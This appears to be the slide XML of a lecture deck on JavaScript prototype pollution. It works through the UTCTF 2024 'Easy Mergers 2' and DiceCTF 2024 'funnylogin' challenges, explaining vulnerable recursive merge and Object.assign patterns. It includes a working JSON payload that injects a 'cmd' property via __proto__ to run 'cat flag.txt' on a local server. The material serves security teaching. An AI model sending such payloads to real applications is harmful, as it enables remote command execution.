                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}]}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>You can check that the payload will cause that line of code to run, and is equivalent to the following line of code when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>orig</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"__proto__"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>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"cat flag.txt"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37211403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400" dirty="0"/>
              <a:t>Polluting prototypes: UTCTF 2024/Easy Mergers 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="24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7650" y="1321200"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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"http://localhost/merge"</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Try harder</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"http://localhost/merge"</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--data-raw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'{"attributes": ["__proto__"], "values": [{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": "cat flag.txt"}]}'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flag{:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat_radiation</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"http://localhost/merge"</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flag{:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat_radiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>It works!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Observe that prototype pollution persists, so once the payload is sent, subsequent requests without the payload still reveals the flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>If you want to retry, you need to restart the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>For CTF designers: You might want to use Docker to host such a challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528718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dirty="0"/>
              <a:t>Polluting prototypes 4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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65</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199"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>If we observe that vulnerable line of code again, we can observe that it is enumerating the properties of a user-controllable object and copying the values to another object, i.e. merging [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>This is the most common way prototype pollution can come up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Other common variants include…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" i="1" dirty="0"/>
              <a:t>Badly hand-made</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> recursive object merging (well-known libraries such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>lodash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> are unlikely to be vulnerable) [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="586E75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</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merge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(target, from) {</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="586E75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</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of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</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keys</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from</a:t>
            </a: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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typeof</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from</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"object"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>target</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merge</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target</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</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continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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target</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from</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key</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268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>merge</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JSON</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parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'{ "__proto__": { "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> flag.txt" } }'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>assign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> [2]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="268BD2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</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assign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</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prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> flag.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> })</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The spread syntax, while similar, does not work as it creates a new object [3]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There are of course even more ways to set properties, but you can discover them yourself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15844A00-A672-DF8F-4088-A1824F6D0D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4681786"/>
            <a:ext cx="6434807" cy="461665"/>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https://portswigger.net/web-security/prototype-pollution#how-do-prototype-pollution-vulnerabilities-arise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/assign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Spread_syntax#comparing_with_object.assign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3025197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000" dirty="0"/>
              <a:t>Polluting prototypes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0" err="1"/>
              <a:t>DiceCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0"/>
              <a:t> 2024 Quals/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0" err="1"/>
              <a:t>funnylogin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="20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200"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Curiously, sometimes we only need to access the prototype, and there is no need to pollute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Extremely simplified version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>DiceCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> 2024 Quals/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1]:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = {}</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a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(username) </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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[username])</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     return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
